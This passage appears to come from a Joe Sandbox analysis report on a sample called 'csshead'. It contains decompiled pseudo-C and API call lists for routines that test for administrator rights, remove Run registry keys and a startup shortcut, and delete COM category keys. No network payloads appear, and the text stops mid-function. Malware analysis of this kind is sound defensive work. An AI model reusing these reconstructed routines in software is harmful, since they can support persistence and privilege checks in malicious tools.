    				struct HWND__* _t48;
    				intOrPtr _t50;
    				char* _t60;
    				char* _t62;
    				void* _t64;
    				void* _t66;
    
    				_t64 = _t66;
    				_v8 = __eax;
    				if( *0x40a038 != 0) {
    					_t50 =  *0x40a038; // 0x0
    					 *0x40b4f8(_t50);
    				}
    				 *0x40c24c = CreateEventA(0, 0xffffffff, 0, 0);
    				 *0x40a29c = 0xffffffff;
    				_t13 =  *0x40c24c; // 0x0
    				WaitForSingleObject(_t13, 0xffffffff);
    				_t15 =  *0x40c24c; // 0x0
    				CloseHandle(_t15);
    				E00401308( &_v265, 0x40b518);
    				 *((char*)(_t64 + E004012DC(0x40b518) - 0x109)) = 0;
    				E0040133C( &_v265, ".lnk");
    				E0040471C( &_v265, 0, 0);
    				E0040471C(0x40b518, 0x7530, 0xffffffff);
    				if( *0x40a574 != 0) {
    					_t48 =  *0x40a574; // 0x0
    					SendMessageA(_t48, 0x10, 0, 0);
    				}
    				if( *0x40a034 == 0) {
    					if(_v8 == 0) {
    						_t27 =  *0x40a260; // 0x4021a4
    						SHDeleteKeyA(0x80000001, _t27);
    					} else {
    						_t60 =  *0x40a260; // 0x4021a4
    						E00408064(0x80000001, 0x40b752, _t60);
    					}
    					E00404A1C(0x80000001,  &_v265);
    				} else {
    					if(_v8 == 0) {
    						_t42 =  *0x40a260; // 0x4021a4
    						SHDeleteKeyA(0x80000002, _t42);
    					} else {
    						_t62 =  *0x40a260; // 0x4021a4
    						E00408064(0x80000002, 0x40b752, _t62);
    					}
    					E00404A1C(0x80000002,  &_v265);
    				}
    				_t31 =  *0x40b510; // 0x0
    				E00401828(_t31);
    				_t33 =  *0x40a054; // 0x0
    				ReleaseMutex(_t33);
    				_t35 =  *0x40a054; // 0x0
    				CloseHandle(_t35);
    				_t37 =  *0x40a2a0; // 0x0
    				asm("sbb eax, eax");
    				_t39 =  ~( ~_t37);
    				if(_t39 == 0) {
    					ExitProcess(0);
    				}
    				return _t39;
    			}


    APIs
    • RtlRemoveVectoredExceptionHandler.NTDLL(00000000), ref: 004080DB
    • CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000), ref: 004080E9
    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00408106
    • CloseHandle.KERNEL32(00000000), ref: 00408112
      • Part of subcall function 0040471C: CreateThread.KERNEL32(00000000,00000000,Function_00004608,?,00000000,?), ref: 00404777
      • Part of subcall function 0040471C: SetThreadPriority.KERNEL32(?,000000F1), ref: 00404786
      • Part of subcall function 0040471C: CloseHandle.KERNEL32(?), ref: 00404790
    • SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 00408184
    • ExitProcess.KERNEL32 ref: 00408244
      • Part of subcall function 00408064: RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 0040808B
      • Part of subcall function 00408064: RegDeleteValueA.ADVAPI32(?,?), ref: 0040809D
    • SHDeleteKeyA.SHLWAPI(80000002,004021A4), ref: 004081BB
    • SHDeleteKeyA.SHLWAPI(80000001,004021A4), ref: 004081FB
      • Part of subcall function 00404A1C: RegDeleteValueA.ADVAPI32(?,?), ref: 00404A55
      • Part of subcall function 00401828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00406A2F), ref: 0040183A
    • ReleaseMutex.KERNEL32(00000000), ref: 00408221
    • CloseHandle.KERNEL32(00000000), ref: 0040822D
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • GetVersionExA.KERNEL32(?), ref: 00414333
    • SystemParametersInfoA.USER32(00000029,00000158,?,00000000), ref: 00414376
    • GetObjectA.GDI32(?,0000003C,?), ref: 004143AA
    • lstrcmp.KERNEL32(?,?), ref: 00414476
    • CreateFontIndirectA.GDI32(?), ref: 00414488
    • DrawTextA.USER32(00000000,0043632C,000000FF,?,00000424), ref: 00414541
    • SetRectEmpty.USER32(?), ref: 00414559
    • DrawTextA.USER32(00000000,00436328,000000FF,?,00000424), ref: 00414571
    • SystemParametersInfoA.USER32 ref: 004145EE
      • Part of subcall function 004128F0: SendMessageA.USER32(?,00000446,00100000,?), ref: 0041292D
      • Part of subcall function 004128F0: InvalidateRect.USER32(?,00000000,00000001), ref: 0041293B
    • SystemParametersInfoA.USER32(00001022,00000000,?,00000000), ref: 0041465D
      • Part of subcall function 00412950: GetVersionExA.KERNEL32(?,00000000,00000030), ref: 004129A7
      • Part of subcall function 00412950: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00412A19
      • Part of subcall function 00410C00: LoadLibraryA.KERNEL32(004362AC), ref: 00410C2D
      • Part of subcall function 00410C00: FreeLibrary.KERNEL32(00000000), ref: 00410C67
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 100%
    			E004041CC() {
    				char _v5;
    				void* _v12;
    				void* _v16;
    				long _v20;
    				void* _v24;
    				signed int _v28;
    				int _v32;
    				char _v36;
    				void* _t51;
    
    				_v5 = 0;
    				_v32 = OpenThreadToken(GetCurrentThread(), 8, 0xffffffff,  &_v12);
    				if(_v32 == 0 && GetLastError() == 0x3f0) {
    					_v32 = OpenProcessToken(GetCurrentProcess(), 8,  &_v12);
    				}
    				if(_v32 != 0) {
    					_v16 = E004013DC(0x400);
    					_v32 = GetTokenInformation(_v12, 2, _v16, 0x400,  &_v20);
    					CloseHandle(_v12);
    					if(_v32 != 0) {
    						AllocateAndInitializeSid(0x40a2a4, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24);
    						_t51 =  *_v16 - 1;
    						if(_t51 >= 0) {
    							_v36 = _t51 + 1;
    							_v28 = 0;
    							while(EqualSid(_v24,  *(_v16 + 4 + _v28 * 8)) == 0) {
    								_v28 = _v28 + 1;
    								_t28 =  &_v36;
    								 *_t28 = _v36 - 1;
    								if( *_t28 != 0) {
    									continue;
    								}
    								goto L10;
    							}
    							_v5 = 1;
    						}
    						L10:
    						FreeSid(_v24);
    					}
    					E00401440(_v16);
    				}
    				return _v5;
    			}


    APIs
    • GetCurrentThread.KERNEL32 ref: 004041DE
    • OpenThreadToken.ADVAPI32(00000000), ref: 004041E5
    • GetLastError.KERNEL32 ref: 004041F4
    • GetCurrentProcess.KERNEL32 ref: 00404207
    • OpenProcessToken.ADVAPI32(00000000), ref: 0040420E
      • Part of subcall function 004013DC: GetProcessHeap.KERNEL32(00000000,?), ref: 004013EB
      • Part of subcall function 004013DC: RtlAllocateHeap.NTDLL(00000000), ref: 004013F2
    • GetTokenInformation.ADVAPI32(?,00000002,?,00000400,?), ref: 00404241
    • CloseHandle.KERNEL32(?), ref: 0040424E
    • AllocateAndInitializeSid.ADVAPI32(0040A2A4,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00404278
    • EqualSid.ADVAPI32(?,?), ref: 004042A2
    • FreeSid.ADVAPI32(?), ref: 004042BE
      • Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
      • Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 73%
    			E00405FB0() {
    				void* __edi;
    				int _t80;
    				int _t84;
    				int _t86;
    				void* _t88;
    				int _t89;
    				int _t100;
    				int _t103;
    				int _t108;
    				int _t111;
    				int _t114;
    				int _t115;
    				intOrPtr* _t116;
    				intOrPtr* _t118;
    				int _t120;
    				int _t123;
    				int* _t129;
    				void* _t154;
    				intOrPtr* _t172;
    				int _t181;
    				void* _t184;
    				void* _t185;
    				void* _t186;
    				void* _t189;
    				void* _t197;
    				void* _t198;
    				void* _t199;
    				void* _t200;
    
    				_t184 = _t185 - 0x6c;
    				_t186 = _t185 - 0x12c;
    				_t129 =  *(_t184 + 0x78);
    				 *(_t184 + 0x68) = 0;
    				if(_t129 == 0) {
    					L41:
    					__eflags = 0;
    					return 0;
    				} else {
    					_t172 =  *((intOrPtr*)(_t184 + 0x74));
    					_t197 =  *_t172 -  *0x436a60; // 0x0
    					if(_t197 != 0) {
    						L5:
    						_push(_t184 + 0x68);
    						_push(0x4359e8);
    						_push(1);
    						_push(0);
    						_push(0x436a80);
    						if( *0x433604() >= 0) {
    							__eflags =  *_t129;
    							if( *_t129 == 0) {
    								L22:
    								__eflags =  *(_t184 + 0x7c);
    								if( *(_t184 + 0x7c) == 0) {
    									 *0x4335e4(_t172, _t184 - 0xc0, 0x40);
    									 *(_t184 + 0x78) = 0;
    									_t84 = lstrlenW(_t184 - 0xc0);
    									_t158 = _t184 + 0x7c;
    									 *(_t184 + 0x7c) = _t84 + 1;
    									_t86 = E004036F0(_t184 + 0x7c, _t84 + 1, 2);
    									_t189 = _t186 + 0xc;
    									__eflags = _t86;
    									if(_t86 >= 0) {
    										_t178 =  *(_t184 + 0x7c);
    										__eflags =  *(_t184 + 0x7c) - 0x400;
    										if(__eflags > 0) {
    											L27:
    											_t88 = L00405440(_t184 + 0x78, _t172, _t178);
    										} else {
    											_t111 = L00404C30(_t158, __eflags, _t178);
    											_t189 = _t189 + 4;
    											__eflags = _t111;
    											if(_t111 == 0) {
    												goto L27;
    											} else {
    												L00422450(_t178);
    												_t88 = _t189;
    											}
    										}
    										_t89 = L00403720(_t88, _t184 - 0xc0, _t178, 3);
    										_t179 = _t89;
    										__eflags = _t89;
    										if(__eflags != 0) {
    											L00403790(__eflags, _t184 - 0x40, 0x80, "CLSID\\");
    											E004039C0(__eflags, _t184 - 0x40, 0x80, _t179);
    											E004039C0(__eflags, _t184 - 0x40, 0x80, "\\Required Categories");
    											 *((intOrPtr*)(_t184 + 0x50)) = 0x80000000;
    											 *((intOrPtr*)(_t184 + 0x54)) = 0;
    											 *((intOrPtr*)(_t184 + 0x58)) = 0;
    											 *(_t184 + 0x5c) = 0;
    											 *((intOrPtr*)(_t184 + 0x60)) = 0;
    											 *((intOrPtr*)(_t184 + 0x64)) = 0;
    											 *(_t184 + 0x7c) = 0;
    											__eflags = L00403EC0(0x80000000, _t184 - 0x40, 0x20019);
    											if(__eflags == 0) {
    												_t108 = RegQueryInfoKeyA( *(_t184 + 0x5c), 0, 0, 0, _t184 + 0x7c, 0, 0, 0, 0, 0, 0, 0);
    												L00403DE0(_t184 + 0x5c);
    												__eflags = _t108;
    												if(__eflags == 0) {
    													__eflags =  *(_t184 + 0x7c);
    													if(__eflags == 0) {
    														L00403D60(_t184 + 0x50, _t184 - 0x40);
    													}
    												}
    											}
    											L00403790(__eflags, _t184 - 0x40, 0x80, "CLSID\\");
    											E004039C0(__eflags, _t184 - 0x40, 0x80, _t179);
    											E004039C0(__eflags, _t184 - 0x40, 0x80, "\\Implemented Categories");
    											_t100 = L00403EC0(0x80000000, _t184 - 0x40, 0x20019);
    											__eflags = _t100;
    											if(_t100 == 0) {
    												_t103 = RegQueryInfoKeyA( *(_t184 + 0x5c), 0, 0, 0, _t184 + 0x7c, 0, 0, 0, 0, 0, 0, 0);
    												L00403DE0(_t184 + 0x5c);
    												__eflags = _t103;
    												if(_t103 == 0) {
    													__eflags =  *(_t184 + 0x7c);
    													if( *(_t184 + 0x7c) == 0) {
    														L00403D60(_t184 + 0x50, _t184 - 0x40);
    													}
    												}
    											}
    											L00404D80(_t184 + 0x5c);
    											L00404D80(_t184 + 0x50);
    										}
    									}
    									L00404940(_t184 + 0x78);
    								}
    								_t80 =  *(_t184 + 0x68);
    								__eflags = _t80;
    								if(_t80 != 0) {
    									 *((intOrPtr*)( *((intOrPtr*)( *_t80 + 8))))(_t80);
    								}
    								goto L41;
    							} else {
    								do {
    									__eflags =  *(_t184 + 0x7c);
    									_t114 = _t129[1];
    									 *((intOrPtr*)(_t184 + 0x40)) =  *_t114;
    									 *((intOrPtr*)(_t184 + 0x44)) =  *((intOrPtr*)(_t114 + 4));
    									 *((intOrPtr*)(_t184 + 0x48)) =  *((intOrPtr*)(_t114 + 8));
    									_t115 =  *(_t184 + 0x68);
    									 *((intOrPtr*)(_t184 + 0x4c)) =  *((intOrPtr*)(_t114 + 0xc));
    									_t154 =  *_t115;
    									_push(_t184 + 0x40);
    									_push(1);
    									_push(_t172);
    									_push(_t115);
    									if( *(_t184 + 0x7c) == 0) {
    										__eflags =  *_t129 - 1;
    										if( *_t129 != 1) {
    											_t116 =  *((intOrPtr*)(_t154 + 0x20));
    										} else {
    											_t116 =  *((intOrPtr*)(_t154 + 0x18));
    										}
    										 *_t116();
    										goto L21;
    									} else {
    										__eflags =  *_t129 - 1;
    										if( *_t129 != 1) {
    											_t118 =  *((intOrPtr*)(_t154 + 0x1c));
    										} else {
    											_t118 =  *((intOrPtr*)(_t154 + 0x14));
    										}
    										_t181 =  *_t118();
    										__eflags = _t181;
    										if(_t181 >= 0) {
    											goto L21;
    										} else {
    											_t120 =  *(_t184 + 0x68);
    											__eflags = _t120;
    											if(_t120 != 0) {
    												 *((intOrPtr*)( *((intOrPtr*)( *_t120 + 8))))(_t120);
    											}
    											return _t181;
    										}
    									}
    									goto L42;
    									L21:
    									_t129 =  &(_t129[2]);
    									__eflags =  *_t129;
    								} while ( *_t129 != 0);
    								goto L22;
    							}
    						} else {
    							_t123 =  *(_t184 + 0x68);
    							if(_t123 == 0) {
    								goto L41;
    							} else {
    								 *((intOrPtr*)( *((intOrPtr*)( *_t123 + 8))))(_t123);
    								return 0;
    							}
    						}
    					} else {
    						_t198 =  *((intOrPtr*)(_t172 + 4)) -  *0x436a64; // 0x0
    						if(_t198 != 0) {
    							goto L5;
    						} else {
    							_t199 =  *((intOrPtr*)(_t172 + 8)) -  *0x436a68; // 0x0
    							if(_t199 != 0) {
    								goto L5;
    							} else {
    								_t200 =  *((intOrPtr*)(_t172 + 0xc)) -  *0x436a6c; // 0x0
    								if(_t200 == 0) {
    									goto L41;
    								} else {
    									goto L5;
    								}
    							}
    						}
    					}
    				}
    				L42:
    			}
    0x00405fb1
    0x00405fb5
    0x00405fbc
    0x00405fc1
    0x00405fca
    0x004062a5
    0x004062a5
    0x004062b4
    0x00405fd0
    0x00405fd0
    0x00405fd5
    0x00405fdb
    0x00406002
    0x00406005
    0x00406006
    0x0040600b
    0x0040600d
    0x0040600f
    0x0040601c
    0x00406043
    0x00406046
    0x004060c2
    0x004060c2
    0x004060c6
    0x004060d6
    0x004060e3
    0x004060ea
    0x004060f4
    0x004060f8
    0x004060fb
    0x00406100
    0x00406103
    0x00406105
    0x0040610b
    0x0040610e
    0x00406114
    0x0040612e
    0x00406132
    0x00406116
    0x00406117
    0x0040611c
    0x0040611f
    0x00406121
    0x00000000
    0x00406123
    0x00406125
    0x0040612a
    0x0040612a
    0x00406121
    0x00406142
    0x00406147
    0x00406149
    0x0040614b
    0x0040615f
    0x0040616e
    0x00406181
    0x0040619c
    0x004061a3
    0x004061a6
    0x004061a9
    0x004061ac
    0x004061af
    0x004061b2
    0x004061ba
    0x004061bc
    0x004061d0
    0x004061db
    0x004061e0
    0x004061e2
    0x004061e4
    0x004061e7
    0x004061f0
    0x004061f0
    0x004061e7
    0x004061e2
    0x00406203
    0x00406212
    0x00406225
    0x0040623e
    0x00406243
    0x00406245
    0x00406259
    0x00406264
    0x00406269
    0x0040626b
    0x0040626d
    0x00406270
    0x00406279
    0x00406279
    0x00406270
    0x0040626b
    0x00406281
    0x00406289
    0x00406289
    0x0040614b
    0x00406291
    0x00406291
    0x00406296
    0x00406299
    0x0040629b
    0x004062a3
    0x004062a3
    0x00000000
    0x00406048
    0x00406048
    0x00406048
    0x0040604c
    0x00406051
    0x00406057
    0x0040605d
    0x00406063
    0x00406066
    0x00406069
    0x0040606e
    0x0040606f
    0x00406071
    0x00406072
    0x00406073
    0x004060ab
    0x004060ae
    0x004060b5
    0x004060b0
    0x004060b0
    0x004060b0
    0x004060b8
    0x00000000
    0x00406075
    0x00406075
    0x00406078
    0x0040607f
    0x0040607a
    0x0040607a
    0x0040607a
    0x00406084
    0x00406086
    0x00406088
    0x00000000
    0x0040608a
    0x0040608a
    0x0040608d
    0x0040608f
    0x00406097
    0x00406097
    0x004060a8
    0x004060a8
    0x00406088
    0x00000000
    0x004060ba
    0x004060ba
    0x004060bd
    0x004060bd
    0x00000000
    0x00406048
    0x0040601e
    0x0040601e
    0x00406023
    0x00000000
    0x00406029
    0x0040602f
    0x00406040
    0x00406040
    0x00406023
    0x00405fdd
    0x00405fe0
    0x00405fe6
    0x00000000
    0x00405fe8
    0x00405feb
    0x00405ff1
    0x00000000
    0x00405ff3
    0x00405ff6
    0x00405ffc
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00405ffc
    0x00405ff1
    0x00405fe6
    0x00405fdb
    0x00000000

    APIs
    • CoCreateInstance.OLE32(00436A80,00000000,00000001,004359E8,?), ref: 00406014
    • StringFromGUID2.OLE32(?,?,00000040), ref: 004060D6
    • lstrlenW.KERNEL32(?), ref: 004060EA
      • Part of subcall function 00403720: WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,?,?,00000000,00000000,?,00405861,00000000,?,00000001,00000003,00000001), ref: 00403748
      • Part of subcall function 00403EC0: RegOpenKeyExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,?,00404DD6,?,?,?,?), ref: 00403EFF
      • Part of subcall function 00403EC0: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 00403F10
    • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,80000000,?,00020019), ref: 004061D0
    • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,80000000,?,00020019), ref: 00406259
      • Part of subcall function 00403DE0: RegCloseKey.ADVAPI32 ref: 00403DEC
      • Part of subcall function 00403D60: GetModuleHandleA.KERNEL32(Advapi32.dll,00000000,00407F6E,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00403D89
      • Part of subcall function 00403D60: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExA), ref: 00403D99
      • Part of subcall function 00403D60: RegDeleteKeyA.ADVAPI32(00000000,?), ref: 00403DCC
      • Part of subcall function 00404D80: RegCloseKey.ADVAPI32(00000000,00000000,0040804B,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404D8A
    Strings
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    APIs
    • GetStartupInfoW.KERNEL32(?), ref: 0042CE8A
      • Part of subcall function 0042A124: Sleep.KERNEL32(00000000), ref: 0042A14C
    • GetFileType.KERNEL32(?), ref: 0042CFBD
    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0), ref: 0042CFF3
    • GetStdHandle.KERNEL32(-000000F6), ref: 0042D047
    • GetFileType.KERNEL32(00000000), ref: 0042D059
    • InitializeCriticalSectionAndSpinCount.KERNEL32(-00443954,00000FA0), ref: 0042D087
    • SetHandleCount.KERNEL32 ref: 0042D0B0
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 004188C1
    • GetVersionExA.KERNEL32(?,00000000,00000030), ref: 0041890C
    • CheckMenuRadioItem.USER32(?,?,?,00000000,00000000), ref: 004189DC
      • Part of subcall function 00410D10: GetVersionExA.KERNEL32(?), ref: 00410D4A
    • GetMenuItemInfoA.USER32 ref: 0041898E
    • SetMenuItemInfoA.USER32(?,?,00000000,0000002C), ref: 004189BB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • SetTextColor.GDI32(?,?), ref: 00413E6B
    • SetBkMode.GDI32(?,?), ref: 00413E76
    • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 00413E86
    • SelectObject.GDI32(?,00000000), ref: 00413E9C
    • SendMessageA.USER32 ref: 00413F0F
    • DrawTextA.USER32(?,000000C8,000000FF,?,?), ref: 00413F37
    • SelectObject.GDI32(?,?), ref: 00413F47
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 100%
    			E00413E50(void* __ecx, intOrPtr _a4) {
    				char _v215;
    				char _v216;
    				CHAR* _v220;
    				CHAR* _v224;
    				CHAR* _v228;
    				CHAR* _v232;
    				CHAR* _v236;
    				CHAR* _v240;
    				CHAR* _v244;
    				void* _v248;
    				void* _v252;
    				void* _v260;
    				int _t38;
    				void* _t41;
    				intOrPtr _t54;
    				struct HDC__* _t56;
    				void* _t57;
    
    				_t54 = _a4;
    				_t56 =  *(_t54 + 0x10);
    				_t41 = __ecx;
    				SetTextColor(_t56,  *(_t54 + 0x3c));
    				SetBkMode(_t56,  *(_t54 + 0x64));
    				_t57 = SendMessageA( *(__ecx + 4), 0x31, 0, 0);
    				_v252 = 0;
    				if(_t57 != 0) {
    					_v260 = SelectObject(_t56, _t57);
    				}
    				_v216 = 0;
    				E00422840( &_v215, 0, 0xc7);
    				_v244 = 0;
    				_v224 = 0;
    				_v220 = 0;
    				_v240 = 0;
    				_v236 = 0;
    				_v232 = 0;
    				_v228 = 0;
    				_v224 =  &_v216;
    				_v248 = 0x20;
    				_v244 = 2;
    				_v220 = 0xc8;
    				SendMessageA( *(_t41 + 4), 0x441,  *(_t54 + 0x24),  &_v248);
    				_t38 = DrawTextA(_t56,  &_v216, 0xffffffff, _t54 + 0x14,  !(( *(_t41 + 0x85) & 0x000000ff) << 0x12) & 0x00100000 | 0x00000025);
    				if(_t57 != 0) {
    					return SelectObject(_t56, _v252);
    				}
    				return _t38;
    			}
    0x00413e5a
    0x00413e64
    0x00413e69
    0x00413e6b
    0x00413e76
    0x00413e8c
    0x00413e8e
    0x00413e98
    0x00413ea2
    0x00413ea2
    0x00413eb2
    0x00413eb7
    0x00413ec1
    0x00413ec5
    0x00413ec9
    0x00413ed2
    0x00413ed6
    0x00413eda
    0x00413ede
    0x00413eea
    0x00413ef7
    0x00413eff
    0x00413f07
    0x00413f0f
    0x00413f37
    0x00413f3f
    0x00000000
    0x00413f47
    0x00413f57

    APIs
    • SetTextColor.GDI32(?,?), ref: 00413E6B
    • SetBkMode.GDI32(?,?), ref: 00413E76
    • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 00413E86
    • SelectObject.GDI32(?,00000000), ref: 00413E9C
    • SendMessageA.USER32 ref: 00413F0F
    • DrawTextA.USER32(?,000000C8,000000FF,?,?), ref: 00413F37
    • SelectObject.GDI32(?,?), ref: 00413F47
    Strings
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    C-Code - Quality: 88%
    			E0041FDD0(void* __ecx, CHAR* _a4) {
    				char _v516;
    				intOrPtr _t19;
    				CHAR* _t22;
    				void* _t32;
    
    				_t32 = __ecx;
    				lstrcpyA( &_v516,  *(__ecx + 0xc));
    				_t22 = _a4;
    				if(_t22 != 0) {
    					lstrcatA( &_v516, " - ");
    					lstrcatA( &_v516, _t22);
    					_t19 =  *((intOrPtr*)(_t32 + 8));
    					if(_t19 > 0) {
    						_push(_t19);
    						wsprintfA( &(( &_v516)[lstrlenA( &_v516) + 0x10]), ":%d");
    					}
    				}
    				return SetWindowTextA( *(_t32 - 0x38),  &_v516);
    			}
    0x0041fdd8
    0x0041fde3
    0x0041fde9
    0x0041fdf2
    0x0041fe05
    0x0041fe0d
    0x0041fe0f
    0x0041fe15
    0x0041fe17
    0x0041fe2d
    0x0041fe33
    0x0041fe15
    0x0041fe4d

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    APIs
    • FindResourceA.KERNEL32(00442B94,?,000000F1), ref: 0041EBC5
    • LoadResource.KERNEL32(00442B94,00000000), ref: 0041EBDE
    • LockResource.KERNEL32(00000000), ref: 0041EBE9
    • CreateWindowExA.USER32(00000000,00436780,00000000,?,00000000,00000000,00000064,00000064,?,?,00442B90,00000000), ref: 0041ECD8
    • GetStockObject.GDI32(0000000D), ref: 0041ED26
    • GetObjectA.GDI32(?,0000003C,?), ref: 0041ED50
    • FindResourceA.KERNEL32(00442B94,?,00000002), ref: 0041ED77
    • LoadResource.KERNEL32(?,00000000), ref: 0041ED83
    • LockResource.KERNEL32(00000000), ref: 0041ED8A
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • InterlockedIncrement.KERNEL32(00000000), ref: 0042111C
    • lstrlen.KERNEL32 ref: 00421136
    • InterlockedDecrement.KERNEL32(?), ref: 004211A8
    • PathFindExtensionA.SHLWAPI(?), ref: 004211FB
    • lstrcmpi.KERNEL32(00000000,?), ref: 0042120F
    • InterlockedDecrement.KERNEL32(?), ref: 00421230
    • InterlockedDecrement.KERNEL32(?), ref: 0042128D
    • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 004212BA
    • InterlockedDecrement.KERNEL32(?), ref: 004212D3
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 75%
    			E004210D0(intOrPtr* __ecx) {
    				CHAR* _t41;
    				long _t44;
    				CHAR* _t47;
    				CHAR* _t49;
    				CHAR* _t57;
    				CHAR* _t59;
    				void* _t61;
    				long _t64;
    				void* _t68;
    				signed int _t71;
    				void* _t80;
    				CHAR* _t81;
    				char* _t84;
    				int _t92;
    				CHAR* _t94;
    				LONG* _t95;
    				LONG* _t96;
    				intOrPtr* _t97;
    				void* _t98;
    				void* _t107;
    				void* _t114;
    
    				_t97 = __ecx;
    				_t71 = 0;
    				 *( *(_t98 + 8)) = 0;
    				if( *((intOrPtr*)(__ecx + 0x18)) <= 0) {
    					L19:
    					_t81 =  *0x440024; // 0x44001c
    					_push(4);
    					 *(_t98 + 0x14) = _t81;
    					_push(_t98 + 0x14);
    					if( *((intOrPtr*)( *((intOrPtr*)( *_t97 + 0x2c))))() == 0) {
    						goto L35;
    					} else {
    						_t41 =  *(_t98 + 0x10);
    						if( *((intOrPtr*)(_t41 - 8)) == 0) {
    							goto L36;
    						} else {
    							_t47 = PathFindExtensionA( *(_t98 + 0x20));
    							if(_t47 == 0 || lstrcmpiA(_t47,  *(_t98 + 0x10)) != 0) {
    								goto L35;
    							} else {
    								_t49 =  *(_t98 + 0x10);
    								_t114 = _t49 - 0xc -  *0x440020; // 0x440010
    								if(_t114 != 0 && InterlockedDecrement( &(_t49[0xfffffffffffffff4])) <= 0) {
    									_push( &(( *(_t98 + 0x10))[0xfffffffffffffff4]));
    									L004221B4();
    								}
    								return 4;
    							}
    						}
    					}
    				} else {
    					while(_t71 >= 0 && _t71 <  *((intOrPtr*)(_t97 + 0x18))) {
    						 *((intOrPtr*)(_t98 + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t97 + 0x14)) + _t71 * 4));
